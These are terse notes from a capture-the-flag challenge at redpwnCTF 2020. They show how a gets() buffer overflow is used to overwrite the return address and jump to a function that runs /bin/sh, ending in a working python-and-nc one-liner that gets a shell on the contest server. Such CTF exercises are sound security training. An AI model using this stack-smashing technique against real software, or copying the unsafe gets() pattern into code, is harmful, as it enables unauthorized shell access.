You'll have to jump to a function now!?

nc 2020.redpwnc.tf 31908

----------------------------------------

char name[16];

...

gets(name);

void binFunction() {
  system("/bin/sh");
}

----------------------------------------

disassemble and find address of function to call

00000000004006e6 <binFunction>:

\xe6\x06\x40


find how to overwrite RIP


python -c "print 'a'*24" | ./c;


segfault 24 spaces in

size 24-25

    Segmentation fault (core dumped)

size 26 - 30

    Bad RIP value.

size 31 + 

    general protection fault




(python -c 'print "a"*24 +"\xe6\x06\x40"'; cat) | nc 2020.redpwnc.tf 31908

